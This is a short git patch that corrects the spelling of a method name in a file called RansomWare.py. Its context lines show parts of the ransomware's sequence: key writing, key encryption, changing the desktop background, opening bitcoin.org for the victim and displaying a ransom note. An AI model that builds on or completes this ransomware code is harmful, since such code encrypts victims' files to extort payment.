See More

From 8e60f43f32c723b0398cccf8a6acaed95bae5c8b Mon Sep 17 00:00:00 2001 From: Mekel Date: Mon, 18 Jan 2021 18:25:50 +0700 Subject: [PATCH] Fixing typo I think you misspell bitcoin spelling :) --- RansomWare.py | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/RansomWare.py b/RansomWare.py index 5857cce..da98d34 100644 --- a/RansomWare.py +++ b/RansomWare.py @@ -129,7 +129,7 @@ def crypt_system(self, encrypted=False): @staticmethod - def what_is_bitcion(): + def what_is_bitcoin(): url = 'https://bitcoin.org' # Open browser to the https://bitcoin.org so they know what bitcoin is webbrowser.open(url) @@ -237,7 +237,7 @@ def main(): rw.write_key() rw.encrypt_fernet_key() rw.change_desktop_background() - rw.what_is_bitcion() + rw.what_is_bitcoin() rw.ransom_note() t1 = threading.Thread(target=rw.show_ransom_note)